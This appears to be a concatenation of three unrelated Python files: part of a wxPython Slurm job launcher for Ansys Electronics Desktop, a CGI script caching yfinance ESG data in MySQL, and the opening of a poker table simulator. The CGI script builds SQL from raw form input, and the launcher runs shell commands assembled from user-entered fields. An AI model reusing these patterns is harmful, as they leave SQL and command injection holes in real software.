# run in list to keep order
for i, queue_name in enumerate(queue_dict):
self.load_grid.SetCellValue(i, 0, str(queue_dict[queue_name]["avail_cores"]))
self.load_grid.SetCellValue(i, 1, str(queue_dict[queue_name]["used_cores"]))
self.load_grid.SetCellValue(i, 2, str(queue_dict[queue_name]["reserved_cores"]))
self.load_grid.SetCellValue(i, 3, str(queue_dict[queue_name]["failed_cores"]))
self.load_grid.SetCellValue(i, 4, str(queue_dict[queue_name]["total_cores"]))
def read_custom_builds(self):
"""Reads all specified in JSON file custom builds."""
if os.path.isfile(self.user_build_json):
try:
with open(self.user_build_json) as file:
self.builds_data = json.load(file)
except json.decoder.JSONDecodeError:
print("JSON file with user builds is corrupted")
os.remove(self.user_build_json)
return
for bld_version, bld_path in self.builds_data.items():
prod_list_path = os.path.join(bld_path, "config", "ProductList.txt")
if not os.path.isfile(prod_list_path):
print(f"Product is not available. Please check {bld_path}")
continue
self.user_build_viewlist.AppendItem([bld_version, bld_path])
install_dir[bld_version] = bld_path
with open(prod_list_path) as file:
self.products[bld_version] = next(file).rstrip() # get first line
# update values in version selector on 1st page
init_combobox(install_dir.keys(), self.m_select_version1, default_version)
def write_custom_build(self):
"""Create a user JSON file with custom builds and to update selector."""
num_rows = self.user_build_viewlist.GetItemCount()
self.builds_data = {}
for i in range(num_rows):
self.builds_data[self.user_build_viewlist.GetTextValue(i, 0)] = self.user_build_viewlist.GetTextValue(i, 1)
# update values in version selector on 1st page
init_combobox(install_dir.keys(), self.m_select_version1, default_version)
with open(self.user_build_json, "w") as file:
json.dump(self.builds_data, file, indent=4)
def settings_save(self, *args):
"""Take all values from the UI and dump them to the .json file."""
self.default_settings = {
"version": __version__,
"queue": self.queue_dropmenu.GetValue(),
"allocation": self.m_alloc_dropmenu.GetValue(),
"num_cores": self.m_numcore.Value,
"aedt_version": self.m_select_version1.Value,
"env_var": self.env_var_text.Value,
"use_node_list": self.m_nodes_list_checkbox.Value,
"node_list": self.m_nodes_list.Value,
"project_path": self.path_textbox.Value,
"use_reservation": self.m_reserved_checkbox.Value,
"reservation_id": self.reservation_id_text.Value,
}
with open(self.default_settings_json, "w") as file:
json.dump(self.default_settings, file, indent=4)
def settings_load(self):
"""Read settings file and populate UI with values."""
with open(self.default_settings_json, "r") as file:
self.default_settings = json.load(file)
try:
if self.default_settings["queue"] not in queue_config_dict:
# if queue was deleted from cluster
self.default_settings["queue"] = default_queue
self.queue_dropmenu.Value = self.default_settings["queue"]
self.m_numcore.Value = self.default_settings["num_cores"]
self.m_select_version1.Value = self.default_settings["aedt_version"]
self.env_var_text.Value = self.default_settings["env_var"]
self.m_nodes_list.Value = self.default_settings.get("node_list", "")
self.m_nodes_list_checkbox.Value = self.default_settings.get("use_node_list", False)
self.path_textbox.Value = self.default_settings["project_path"]
self.m_reserved_checkbox.Value = self.default_settings["use_reservation"]
self.reservation_id_text.Value = self.default_settings["reservation_id"]
queue_value = self.queue_dropmenu.GetValue()
self.m_node_label.LabelText = self.construct_node_specs_str(queue_value)
except wx._core.wxAssertionError:
add_message(
"UI was updated or default settings file was corrupted. Please save default settings again", "", "i"
)
@staticmethod
def construct_node_specs_str(queue):
"""Construct node description string from cluster configuration data
Parameters
queue
Queue for which we need a node description
Returns
-------
str
Human readable string for the UI with number of cores and
RAM per node.
"""
node_str = f"({queue_config_dict[queue]['cores']} Cores, {queue_config_dict[queue]['ram']}GB RAM per node)"
return node_str
def settings_reset(self, *args):
"""Remove settings previously set by user.
Fired on click to reset to factory.
"""
if os.path.isfile(self.default_settings_json):
os.remove(self.default_settings_json)
add_message("To complete resetting please close and start again the application", "", "i")
def timer_stop(self):
self.running = False
def evt_num_cores_nodes_change(self, *args):
try:
num_cores = num_nodes = int(self.m_numcore.Value or 0)
except ValueError:
self.add_status_msg("Nodes Value must be integer", level="!")
self.m_numcore.Value = str(1)
return
if num_cores < 0:
self.m_numcore.Value = str(1)
return
cores_per_node = queue_config_dict[self.queue_dropmenu.Value]["cores"]
ram_per_node = queue_config_dict[self.queue_dropmenu.Value]["ram"]
if self.m_alloc_dropmenu.GetCurrentSelection() == 0:
if num_cores > cores_per_node:
self.m_numcore.Value = str(cores_per_node)
# todo add status message
summary_msg = f"You request {self.m_numcore.Value} Cores and {ram_per_node}GB of shared RAM"
else:
total_cores = cores_per_node * num_nodes
total_ram = ram_per_node * num_nodes
summary_msg = f"You request {total_cores} Cores and {total_ram}GB RAM"
self.m_summary_caption.LabelText = summary_msg
def evt_select_allocation(self, *args):
"""Callback when user changes allocation strategy."""
if self.m_alloc_dropmenu.GetCurrentSelection() == 0:
self.m_num_cores_caption.LabelText = "# Cores"
else:
self.m_num_cores_caption.LabelText = "# Nodes"
def select_mode(self, *args):
"""Callback invoked on change of the mode Pre/Post or Interactive.
Grey out options that are not applicable for Pre/Post.
"""
sel = self.submit_mode_radiobox.Selection
if sel == 3:
enable = True
self.m_nodes_list.Show(self.m_nodes_list_checkbox.Value) # required for proper rendering
else:
enable = False
self.m_nodes_list_checkbox.Value = False
self.m_reserved_checkbox.Value = False
self.reservation_id_text.Show(enable)
self.m_nodes_list.Show(enable)
self.m_summary_caption.Show(enable)
self.queue_dropmenu.Show(enable)
self.m_numcore.Show(enable)
self.m_node_label.Show(enable)
self.m_nodes_list_checkbox.Show(enable)
self.m_alloc_dropmenu.Show(enable)
self.m_num_cores_caption.Show(enable)
self.m_alloc_caption.Show(enable)
self.m_queue_caption.Show(enable)
self.m_specify_nodes_caption.Show(enable)
# todo remove if find a way to run reservation for Slurm batch
self.m_reserved_checkbox.Show(enable)
self.m_reservation_caption.Show(enable)
# self.m_alloc_dropmenu.Enable(enable) # todo enable if Slurm will support non-exclusive
self.evt_select_allocation()
self.evt_num_cores_nodes_change()
def update_job_status(self, *args):
"""Event is called to update a viewlist with current running jobs from main thread (thread safety)."""
self.qstat_viewlist.DeleteAllItems()
for q_dict in qstat_list:
self.qstat_viewlist.AppendItem(
[
q_dict["pid"],
q_dict["state"],
q_dict["name"],
q_dict["user"],
q_dict["queue_data"],
q_dict["proc"],
q_dict["started"],
]
)
def update_msg_list(self):
"""Update messages on checkbox and init from file"""
self.scheduler_msg_viewlist.DeleteAllItems()
for msg in self.log_data["Message List"]:
sched = msg[3]
if sched or self.m_checkBox_allmsg.Value:
tab_data = msg[0:3]
self.scheduler_msg_viewlist.PrependItem(tab_data)
def add_log_entry(self, *args):
"""Add new entry to the Scheduler Messages Window."""
scheduler = log_dict.get("scheduler", True)
timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
message = wordwrap(log_dict["msg"], 600, wx.ClientDC(self))
data = [timestamp, log_dict.get("pid", "0"), message, scheduler]
if scheduler or self.m_checkBox_allmsg.Value:
tab_data = data[0:3]
self.scheduler_msg_viewlist.PrependItem(tab_data)
self.log_data["Message List"].append(data)
with open(self.logfile, "w") as fa:
json.dump(self.log_data, fa, indent=4)
def rmb_on_scheduler_msg_list(self, *args):
"""When clicking RMB on the scheduler message list it will
propose a context menu with choice to delete all messages.
"""
position = wx.ContextMenuEvent(type=wx.wxEVT_NULL)
self.PopupMenu(ClearMsgPopupMenu(self), position.GetPosition())
def leftclick_processtable(self, *args):
"""On double click on process row will propose to abort running job"""
self.cancel_job()
def cancel_job(self):
"""
Send Slurm scancel command
:return:
"""
row = self.qstat_viewlist.GetSelectedRow()
pid = self.qstat_viewlist.GetTextValue(row, 0)
result = add_message("Abort Queue Process {}?\n".format(pid), "Confirm Abort", "?")
if result == wx.ID_OK:
command = f"scancel {pid}"
subprocess.call(command, shell=True)
print(f"Job cancelled via: {command}")
msg = "Job {} cancelled from GUI".format(pid)
try:
self.log_data["PID List"].remove(pid)
except ValueError:
pass
log_dict["pid"] = pid
log_dict["msg"] = msg
log_dict["scheduler"] = False
self.add_log_entry()
def select_queue(self, *args):
"""Called when user selects a value in Queue drop down menu.
Also called during __init__ to fill the UI. Sets PE and
number of cores for each queue.
"""
queue_value = self.queue_dropmenu.GetValue()
self.m_node_label.LabelText = self.construct_node_specs_str(queue_value)
self.evt_num_cores_nodes_change()
def evt_node_list_check(self, *args):
"""Callback called when clicked "Specify node list" options.
Hides/Shows input field for node list.
"""
if self.m_nodes_list_checkbox.Value:
self.m_nodes_list.Show()
else:
self.m_nodes_list.Hide()
def on_reserve_check(self, *args):
"""Callback called when clicked Reservation.
Will Hide/Show input field for reservation ID.
"""
if self.m_reserved_checkbox.Value:
self.reservation_id_text.Show()
else:
self.reservation_id_text.Hide()
def submit_overwatch_thread(self, *args):
"""Opens OverWatch on button click"""
if not os.path.isfile(FIREFOX):
add_message("Firefox is not installed on the cluster", title="Error", icon="!")
return
threading.Thread(target=self.open_overwatch, daemon=True).start()
def check_display_var(self):
"""Validate that DISPLAY variable follow convention hostname:display_number
Returns
-------
str
Proper display value
"""
display_var = os.getenv("DISPLAY", "")
if not display_var:
msg = "DISPLAY environment variable is not specified. Contact cluster admin"
add_message(msg, "Environment error", icon="!")
raise EnvironmentError(msg)
if ":" not in display_var:
msg = "DISPLAY hasn't session number specified. Contact cluster admin"
add_message(msg, "Environment error", icon="!")
raise EnvironmentError(msg)
if not display_var.split(":")[0]:
return f"{self.hostname}:{display_var.split(':')[1]}"
return display_var
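# Hedged example of the normalization above (hostname value is an assumption):
#   DISPLAY=":1"           -> "node001:1"  (hostname prepended)
#   DISPLAY="node001:1.0"  -> returned unchanged
#   DISPLAY="" or "node001" -> add_message(...) and EnvironmentError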
def click_launch(self, *args):
"""Depending on the choice of the user invokes AEDT on visual node or simply for pre/post"""
check_ssh()
aedt_version = self.m_select_version1.Value
aedt_path = install_dir[aedt_version]
env = ""
if self.env_var_text.Value:
env += "" + self.env_var_text.Value
if admin_env_vars:
env_list = [f"{env_var}={env_val}" for env_var, env_val in admin_env_vars.items()]
env += "," + ",".join(env_list)
# verify that no double commas, spaces, etc
if env:
env = re.sub(" ", "", env)
env = re.sub(",+", ",", env)
env = env.rstrip(",").lstrip(",")
reservation, reservation_id = self.check_reservation()
if reservation and not reservation_id:
return
try:
self.update_registry(aedt_path)
except FileNotFoundError:
add_message("Verify project directory. Probably user name was changed", "Wrong project path", "!")
return
op_mode = self.submit_mode_radiobox.GetSelection()
job_type = {0: "pre-post", 1: "monitor", 2: "submit", 3: "interactive"}
try:
self.send_statistics(aedt_version, job_type[op_mode])
except Exception:
# statistics are not critical; do not interrupt the launch
print("Error sending statistics")
if op_mode == 3:
self.submit_interactive_job(aedt_path, env, reservation, reservation_id)
else:
env = env[4:] # remove ALL, from env vars
command_key = ""
if op_mode == 1:
command_key = "-showsubmitjob"
elif op_mode == 2:
command_key = "-showmonitorjob"
threading.Thread(
target=self._submit_batch_thread,
daemon=True,
args=(
aedt_path,
env,
command_key,
),
).start()
def submit_interactive_job(self, aedt_path, env, reservation, reservation_id):
"""
Submit interactive job
:param aedt_path:
:param env:
:param reservation:
:param reservation_id:
:return: None
"""
scheduler = "sbatch"
allocation_rule = self.m_alloc_dropmenu.GetCurrentSelection()
if int(self.m_numcore.Value or 0) < 1:
self.add_status_msg("Nodes Value must be a positive integer", level="!")
return
num_nodes = num_cores = int(self.m_numcore.Value)
queue = self.queue_dropmenu.Value
# interactive submission
env += f",DISPLAY={self.display_node}"
command = [scheduler, "--job-name", "aedt", "--partition", queue, "--export", env]
if allocation_rule == 0:
# 1 node and cores
command += ["--nodes", "1-1", "--ntasks", str(num_cores)]
total_cores = num_cores
else:
cores_per_node = queue_config_dict[queue]["cores"]
total_cores = cores_per_node * num_nodes
command += ["--nodes", f"{num_nodes}-{num_nodes}", "--ntasks", str(total_cores)]
nodes_list_str = self.m_nodes_list.Value
nodes_list_str = nodes_list_str.replace(" ", "")
if self.m_nodes_list_checkbox.Value and nodes_list_str:
command += ["--nodelist", nodes_list_str]
if reservation:
command += ["--reservation", reservation_id]
aedt_str = " ".join([os.path.join(aedt_path, "ansysedt"), "-machinelist", f"num={total_cores}"])
command += ["--wrap", f'"{aedt_str}"']
command = " ".join(command) # convert to string to avoid escaping characters
print(f"Execute via: {command}")
try:
output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True, universal_newlines=True)
except subprocess.CalledProcessError as exc:
msg = exc.output
log_dict["scheduler"] = True
else:
msg = f"Job submitted to {queue}\nSubmit Command:{command}"
pid = output.strip().split()[-1]
log_dict["scheduler"] = False
log_dict["pid"] = pid
self.log_data["PID List"].append(pid)
log_dict["msg"] = msg
self.add_log_entry()
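# Sketch of the command assembled above for an assumed queue/config (values are
# illustrative, not taken from a real queue_config_dict):
#   sbatch --job-name aedt --partition ottc01 --export ALL,DISPLAY=node001:1 \
#          --nodes 2-2 --ntasks 56 --wrap "/opt/AnsysEM/Linux64/ansysedt -machinelist num=56"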
def check_reservation(self):
"""Validate if user wants to run with predefined reservation.
Create a reservation argument for interactive mode or create
.sge_request file with argument for non graphical
Returns
-------
bool
``True`` if the reservation checkbox was checked.
str
Reservation ID.
"""
reservation = self.m_reserved_checkbox.Value
ar = ""
if reservation:
ar = self.reservation_id_text.Value
if ar in [None, ""]:
add_message(
"Reservation ID is not provided. Please set ID and click launch again", "Reservation ID", "!"
)
return reservation, ar
def send_statistics(self, version, job_type):
"""Send usage statistics to the database.
Parameters
----------
version : str
Version of EDT used.
job_type : str
Interactive or non-graphical job type.
"""
if DEBUG_MODE:
return
client = InfluxDBClient(host=STATISTICS_SERVER, port=STATISTICS_PORT)
db_name = "aedt_hpc_launcher"
client.switch_database(db_name)
time_now = datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%SZ")
json_body = [
{
"measurement": db_name,
"tags": {
"username": self.username,
"version": version,
"job_type": job_type,
"cluster": self.hostname[:3],
},
"time": time_now,
"fields": {"count": 1},
}
]
client.write_points(json_body)
def update_registry(self, aedt_path):
"""Set registry for each run of EDT.
This is necessary because each run occurs on a different Linux node.
Disables:
1. Question on product improvement
2. Question on Project directory, this is grabbed from UI
3. Welcome message
4. Question on personal lib
Sets:
1. EDT Installation path
2. Slurm scheduler as default
Parameters
----------
aedt_path : str
Path to the installation directory of EDT.
"""
if not os.path.isdir(self.path_textbox.Value):
os.mkdir(self.path_textbox.Value)
commands = [] # list to aggregate all commands to execute
registry_file = os.path.join(aedt_path, "UpdateRegistry")
# set base for each command: path to registry, product and level
command_base = [
registry_file,
"-Set",
"-ProductName",
self.products[self.m_select_version1.Value],
"-RegistryLevel",
"user",
]
# disable question about participation in product improvement
commands.append(
["-RegistryKey", "Desktop/Settings/ProjectOptions/ProductImprovementOptStatus", "-RegistryValue", "1"]
)
# set installation path
commands.append(["-RegistryKey", "Desktop/InstallationDirectory", "-RegistryValue", aedt_path])
# set project folder
commands.append(["-RegistryKey", "Desktop/ProjectDirectory", "-RegistryValue", self.path_textbox.Value])
# disable welcome message
commands.append(["-RegistryKey", "Desktop/Settings/ProjectOptions/ShowWelcomeMsg", "-RegistryValue", "0"])
# set personal lib
personal_lib = os.path.join(os.environ["HOME"], "Ansoft", "Personallib")
commands.append(["-RegistryKey", "Desktop/PersonalLib", "-RegistryValue", personal_lib])
# set Slurm scheduler
settings_areg = os.path.join(os.path.dirname(os.path.realpath(__file__)), "slurm_settings.areg")
commands.append(["-FromFile", settings_areg])
for command in commands:
subprocess.call(command_base + command)
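# Example of one composed registry call (paths and product name are assumptions,
# shown only to illustrate how command_base and a command entry combine):
#   /opt/AnsysEM/Linux64/UpdateRegistry -Set -ProductName ElectronicsDesktop2021.1 \
#       -RegistryLevel user -RegistryKey Desktop/ProjectDirectory -RegistryValue /home/user/projects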
def m_update_msg_list(self, *args):
"""Fired when user clicks 'Show all messages' for Scheduler messages window"""
self.update_msg_list()
def delete_row(self, *args):
"""By clicking on Delete Row button delete row and rewrite json file with builds"""
row = self.user_build_viewlist.GetSelectedRow()
if row != -1:
self.user_build_viewlist.DeleteItem(row)
self.write_custom_build()
def add_new_build(self, *args):
"""By click on Add New Build opens file dialogue to select path and input box to set name.
At the end we update JSON file with custom builds"""
get_dir_dialogue = wx.DirDialog(
None, "Choose a Linux64 directory:", style=wx.DD_DEFAULT_STYLE | wx.DD_DIR_MUST_EXIST
)
if get_dir_dialogue.ShowModal() == wx.ID_OK:
path = get_dir_dialogue.GetPath()
get_dir_dialogue.Destroy()
else:
get_dir_dialogue.Destroy()
return
if "Linux64" not in path[-7:]:
add_message(
"Your path should include and be ended by Linux64 (eg /ott/apps/ANSYSEM/Linux64)", "Wrong path", "!"
)
return
get_name_dialogue = wx.TextEntryDialog(None, "Set name of a build:", value="AEDT_2019R3")
if get_name_dialogue.ShowModal() == wx.ID_OK:
name = get_name_dialogue.GetValue()
get_name_dialogue.Destroy()
else:
get_name_dialogue.Destroy()
return
if name in [None, ""] + list(self.builds_data.keys()):
add_message("Name cannot be empty and not unique", "Wrong name", "!")
return
# if all is fine add new build
self.user_build_viewlist.AppendItem([name, path])
install_dir[name] = path
with open(os.path.join(path, "config", "ProductList.txt")) as file:
self.products[name] = next(file).rstrip() # get first line
self.write_custom_build()
def set_project_path(self, *args):
"""Invoked when clicked on "..." set_path_button.
Creates a dialogue where user can select directory.
"""
get_dir_dialogue = wx.DirDialog(None, "Choose directory:", style=wx.DD_DEFAULT_STYLE)
if get_dir_dialogue.ShowModal() == wx.ID_OK:
path = get_dir_dialogue.GetPath()
get_dir_dialogue.Destroy()
else:
get_dir_dialogue.Destroy()
return
self.path_textbox.Value = path
def shutdown_app(self, *args):
"""Exit from app by clicking X or Close button.
Kill the process to kill all child threads.
"""
self.timer_stop()
lock_file = os.path.join(self.app_dir, "ui.lock")
try:
os.remove(lock_file)
except FileNotFoundError:
pass
while len(threading.enumerate()) > 1: # possible solution to wait until all threads are dead
time.sleep(0.25)
signal.pthread_kill(threading.get_ident(), signal.SIGINT)
os.kill(os.getpid(), signal.SIGINT)
def open_overwatch(self):
"""Open Overwatch with java."""
command = [FIREFOX, f"{overwatch_url}/users/{self.username}"]
subprocess.call(command)
@staticmethod
def _submit_batch_thread(aedt_path, env, command_key):
"""Start EDT in pre/post mode.
Parameters
----------
aedt_path : str
Path to the EDT root.
env : str
String with list of environment variables.
command_key : str
Add key to open Submit or Monitor Job dialog.
"""
env_vars = os.environ.copy()
if env:
for var_value in env.split(","):
variable, value = var_value.split("=")
env_vars[variable] = value
command = [os.path.join(aedt_path, "ansysedt"), command_key]
print("Electronics Desktop is started via:", subprocess.list2cmdline(command))
subprocess.Popen(command, env=env_vars)
def check_ssh():
"""Verify that all passwordless SSH are in place."""
ssh_path = os.path.join(os.environ["HOME"], ".ssh")
for file in ["authorized_keys", "config"]:
if not os.path.isfile(os.path.join(ssh_path, file)):
if os.path.isdir(ssh_path):
shutil.rmtree(ssh_path)
proc = subprocess.Popen([path_to_ssh], stdin=subprocess.PIPE, shell=True)
proc.communicate(input=b"\n\n\n")
break
def add_message(message, title="", icon="?"):
"""Create a dialog with different set of buttons.
Parameters
----------
message : str
Message you want to show.
title : str, optional
Message window title.
icon : str, optional
Depending on the input will create either question dialogue
(?), error (!) or just an information dialog.
Returns
-------
int
Response from the user (for example, wx.OK).
"""
if icon == "?":
icon = wx.OK | wx.CANCEL | wx.ICON_QUESTION
elif icon == "!":
icon = wx.OK | wx.ICON_ERROR
else:
icon = wx.OK | wx.ICON_INFORMATION
dlg_qdel = wx.MessageDialog(None, message, title, icon)
result = dlg_qdel.ShowModal()
dlg_qdel.Destroy()
return result
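# Minimal usage sketch (assumes a wx.App is running):
#   if add_message("Abort Queue Process 123?", "Confirm Abort", "?") == wx.ID_OK:
#       ...  # user confirmed
#   add_message("Something went wrong", "Error", "!")  # error dialog, OK button only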
def init_combobox(entry_list, combobox, default_value=""):
"""Fills a wx.Combobox element with the entries in a list.
Parameters
----------
entry_list : list
List of text entries to appear in the combobox element.
combobox : wx.Combobox
Object pointing to the combobox element.
default_value : str, optional
Default value (must be present in the entry list, otherwise
will be ignored)
"""
combobox.Clear()
index = 0
for i, value in enumerate(list(entry_list)):
if value == default_value:
index = i
combobox.Append(value)
combobox.SetSelection(index)
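# Usage sketch (queue names and widget name are assumptions):
#   init_combobox(["ottc01", "euc09"], self.queue_dropmenu, default_value="ottc01")
# selects "ottc01" if present, otherwise falls back to the first entry (index 0).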
def main():
"""Main function to generate UI.
Validate that only one instance is opened.
"""
# this 0.7 s sleep prevents a double open when the user has single-click launch enabled in Linux and double-clicks
time.sleep(0.7)
app = wx.App()
lock_file = os.path.join(LauncherWindow.ensure_app_folder(), "ui.lock")
if os.path.exists(lock_file):
result = add_message(
(
"Application was not properly closed or you have multiple instances opened. "
"Do you really want to open new instance?"
),
"Instance error",
"?",
)
if result != wx.ID_OK:
return
else:
with open(lock_file, "w") as file:
file.write("1")
ex = LauncherWindow(None)
ex.Show()
app.MainLoop()
if __name__ == "__main__":
main()
|
index.py
|
#!/usr/bin/python3
import cgi
import mysql.connector
from datetime import datetime, timedelta
from threading import Thread
import json
import yfinance as yf
def commit(ticker_symbol, results, cursor, cnx):
sql1 = "DELETE FROM yahoofinancessustainable WHERE ticker='{}';".format(ticker_symbol)
sql2 = "INSERT INTO yahoofinancessustainable VALUES('{}', '{}', '{}');".format(
ticker_symbol,
results,
str(datetime.now()))
cursor.execute(sql1)
cnx.commit()
cursor.execute(sql2)
cnx.commit()
cursor.close()
cnx.close()
def expected(dump):
return True
def site(ticker_symbol):
stock = yf.Ticker(ticker_symbol)
sus = stock.sustainability
try:
c1 = list(sus.index.values)
c2 = list(sus['Value'].values)
output = {}
for i in range(len(c1)):
output[c1[i]] = c2[i]
except Exception:
keys = ['gmo', 'coal', 'adult', 'nuclear', 'palmOil', 'tobacco', 'catholic', 'gambling', 'totalEsg', 'alcoholic', 'peerCount', 'peerGroup', 'smallArms', 'furLeather', 'percentile', 'pesticides', 'socialScore', 'animalTesting', 'esgPerformance', 'governanceScore', 'environmentScore', 'militaryContract', 'socialPercentile', 'highestControversy', 'controversialWeapons', 'governancePercentile', 'environmentPercentile']
output = {key: 'Not Available' for key in keys}
return json.dumps({'results':output})
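# Illustrative return value (field values are made up, not real ESG data):
#   site("MSFT") -> '{"results": {"totalEsg": 15.2, "socialScore": 8.1, ...}}'
# On any failure the same keys are returned with the value 'Not Available'.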
def main():
form = cgi.FieldStorage()
ticker_symbol = str(form['ticker_symbol'].value).upper()
cnx = mysql.connector.connect(user='api', database='projectapi')
cursor = cnx.cursor(buffered=True)
sql = "SELECT * FROM yahoofinancessustainable WHERE ticker='{}';".format(ticker_symbol)
cursor.execute(sql)
cache_results = ''
cache_expired = False
fetch_results = ''
results = ''
try:
data = list(cursor.fetchall()[0])
if (datetime.now()-timedelta(days=30)) > data[2]:
raise IndexError('item in database expired')
cache_results = json.loads(data[1])
cursor.close()
cnx.close()
except Exception:
cache_expired = True
fetch_results = site(ticker_symbol)
finally:
if not cache_expired:
results = cache_results
elif expected(fetch_results):
t1 = Thread(target=commit, args=(ticker_symbol, fetch_results, cursor, cnx,))
t1.start()
results = fetch_results
elif cache_expired:
results = cache_results
else:
results = json.dumps({'error':'api access problem'})
return results
if __name__ == '__main__':
print('Content-type:application/json', end='\r\n\r\n')
print(main().encode(encoding='UTF-8',errors='ignore').decode(), end='')
|
table.py
|
import time
import uuid
from threading import Thread, Lock
from deuces.deuces import Card, Deck, Evaluator
from .player import Player
class Table(object):
BLIND_INCREMENTS = [[10,25],[25,50],[50,100],[75,150],[100,200],[150,300],[200,400],[300,600],[400,800],[500,1000],[600,1200],[800,1600],[1000,2000]]
def __init__(self, instance_num, seats = 8, quiet = False, training = False):
self.instance_num = instance_num
self._blind_index = 0
[self._smallblind, self._bigblind] = Table.BLIND_INCREMENTS[0]
self._deck = Deck()
self._evaluator = Evaluator()
self.community = []
self._round = 0
self._button = 0
self._discard = []
self._side_pots = [0]*seats
self._current_sidepot = 0 # index of _side_pots
self._totalpot = 0
self._tocall = 0
self._lastraise = 0
self._number_of_hands = 0
# fill seats with dummy players
self._seats = [Player(-1,-1,0,'empty',0,True) for _ in range(seats)]
self.emptyseats = seats
self._player_dict = {}
self._quiet = quiet
self._training = training
self._run_thread = Thread(target = self.run, args=())
self._run_thread.daemon = True
def start(self):
self._run_thread.start()
def run(self):
self.run_game()
def run_game(self):
#print("running game", self.instance_num)
self.ready_players()
# for p in self._seats:
# print('Player ',p.playerID, ' playing hand: ', p.playing_hand, 'sitting out', p.sitting_out)
players = [player for player in self._seats if not player.emptyplayer and not player.sitting_out]
self._number_of_hands = 1
# start hand if table full
# if len(players) == len(self._seats):
[self._smallblind, self._bigblind] = Table.BLIND_INCREMENTS[0]
# keep playing until there's a single player (shotgun style)
place = 1
while(self.emptyseats < len(self._seats)-1):
# answer = input('Press [enter] to start a game:')
# if not answer:
if not self._quiet:
print('Starting game number: ', self._number_of_hands)
for p in self._seats:
if p.playing_hand:
print('Player ',p.playerID, ' stack size: ', p.stack)
self.start_hand(players)
self._number_of_hands += 1
#print("players left", len([p for p in players if p.playing_hand]))
# increment blinds every 15 hands (based on avg hands/hour of 30)
if (self._number_of_hands % 15) == 0 and self._number_of_hands < 60:
self.increment_blinds()
if len([p for p in players if p.playing_hand]) == 1:
#print("winner found!")
winner = [p for p in players if p.playing_hand][0]
if winner.get_ai_type() == 0:
place = 1
else:
place = 2
break
else:
found = False
for p in players:
if p.get_ai_type() == 0 and p.playing_hand:
found = True
break
if not found:
player_left = 0
for p in players:
if p.playing_hand == True:
player_left += 1
place = player_left + 1
break
if self._number_of_hands == 200:
print('no winner in 200 hands')
break
return place
def start_hand(self, players):
players = [p for p in players if p.playing_hand]
assert sum([p.stack for p in players]) == 2000*len(self._seats)
self.new_round()
self._round=0
player = self._first_to_act(players)
self.post_smallblind(player)
player = self._next(players, player)
self.post_bigblind(player)
player = self._next(players, player)
self._tocall = self._bigblind
# rounds
self._round = 0
while self._round<4 and len(players)>1:
if self._round == 0:
self.deal()
elif self._round == 1:
self.flop()
elif self._round == 2:
self.turn()
elif self._round ==3:
self.river()
#print("round", self._round)
folded_players = []
while not player.playedthisround and len([p for p in players if not p.isallin]) >=1:
if player.isallin:
# print('player ', player.playerID, 'is all in, skipping their turn')
player = self._next(players, player)
continue
# print('requesting move from ',player.playerID)
#print("before", player.hand)
move = player.player_move(self.output_state(player))
if move[0] == 'call':
self.player_bet(player, self._tocall)
if not self._quiet:
print('Player', player.playerID, move)
player = self._next(players, player)
elif move[0] == 'check':
self.player_bet(player, player.currentbet)
if not self._quiet:
print('Player', player.playerID, move)
player = self._next(players, player)
elif move[0] == 'raise':
self.player_bet(player, move[1]+player.currentbet)
if not self._quiet:
print('Player', player.playerID, move)
for p in players:
if p != player:
p.playedthisround = False
player = self._next(players, player)
elif move[0] == 'fold':
player.playing_hand = False
folded_player = player
if not self._quiet:
print('Player', player.playerID, move)
player = self._next(players, player)
players.remove(folded_player)
folded_players.append(folded_player)
# break if a single player left
if len(players) ==1:
break
player = self._first_to_act(players)
self.resolve_sidepots(players + folded_players)
self.new_round()
if not self._quiet:
print('totalpot', self._totalpot)
assert sum([p.stack for p in self._seats]) + self._totalpot == 2000*len(self._seats)
self.resolve_game(players)
self.reset()
def increment_blinds(self):
self._blind_index = min(self._blind_index+1,len(Table.BLIND_INCREMENTS)-1)
[self._smallblind, self._bigblind] = Table.BLIND_INCREMENTS[self._blind_index]
def post_smallblind(self, player):
if not self._quiet:
print('player ', player.playerID, 'small blind', self._smallblind)
self.player_bet(player, self._smallblind)
player.playedthisround = False
def post_bigblind(self, player):
if not self._quiet:
print('player ', player.playerID, 'big blind', self._bigblind)
self.player_bet(player, self._bigblind)
player.playedthisround = False
self._lastraise = self._bigblind
def player_bet(self, player, total_bet):
# relative_bet is how much _additional_ money is the player betting this turn, on top of what they have already contributed
# total_bet is the total contribution by player to pot in this round
relative_bet = min(player.stack, total_bet - player.currentbet)
player.bet(relative_bet + player.currentbet)
self._totalpot += relative_bet
self._tocall = max(self._tocall, total_bet)
if self._tocall >0:
self._tocall = max(self._tocall, self._bigblind)
self._lastraise = max(self._lastraise, relative_bet - self._lastraise)
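# Worked example of the relative bet above: if the player already has 50 in this
# round (currentbet=50), total_bet=150 and stack=80, then
# relative_bet = min(80, 150 - 50) = 80, i.e. the player is effectively all in.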
def _first_to_act(self, players):
if self._round == 0 and len(players) == 2:
return self._next(sorted(players + [self._seats[self._button]], key=lambda x:x.get_seat()), self._seats[self._button])
try:
first = [player for player in players if player.get_seat() > self._button][0]
except IndexError:
first = players[0]
return first
def _next(self, players, current_player):
idx = players.index(current_player)
return players[(idx+1) % len(players)]
def deal(self):
for player in self._seats:
if player.playing_hand:
player.hand = self._deck.draw(2)
def flop(self):
self._discard.append(self._deck.draw(1)) #burn
self.community = self._deck.draw(3)
def turn(self):
self._discard.append(self._deck.draw(1)) #burn
self.community.append(self._deck.draw(1))
def river(self):
self._discard.append(self._deck.draw(1)) #burn
self.community.append(self._deck.draw(1))
def add_player(self, playerID, emptyplayer = False, ai_flag = False, ai_type = -1, weights = None, biases = None, stack = 2000):
if playerID not in self._player_dict:
new_player = Player(playerID, emptyplayer, ai_flag, ai_type, weights, biases, stack)
for i,player in enumerate(self._seats):
if player.emptyplayer:
self._seats[i] = new_player
new_player.set_seat(i)
break
self._player_dict[playerID] = new_player
self.emptyseats -= 1
def ready_players(self):
'''
if len([p for p in self._seats if not p.emptyplayer and p.sitting_out]) == len(self._seats):
for p in self._seats:
if not p.emptyplayer:
p.sitting_out = False
p.playing_hand = True
'''
for p in self._seats:
p.sitting_out = False
p.playing_hand = True
#print("Players READY")
def remove_player(self, playerID):
try:
idx = self._seats.index(self._player_dict[playerID])
self._seats[idx] = Player(-1,-1,0,'empty',0,True)
del self._player_dict[playerID]
self.emptyseats += 1
except ValueError:
pass
def resolve_sidepots(self, players_playing):
players = [p for p in players_playing if p.currentbet]
if not self._quiet:
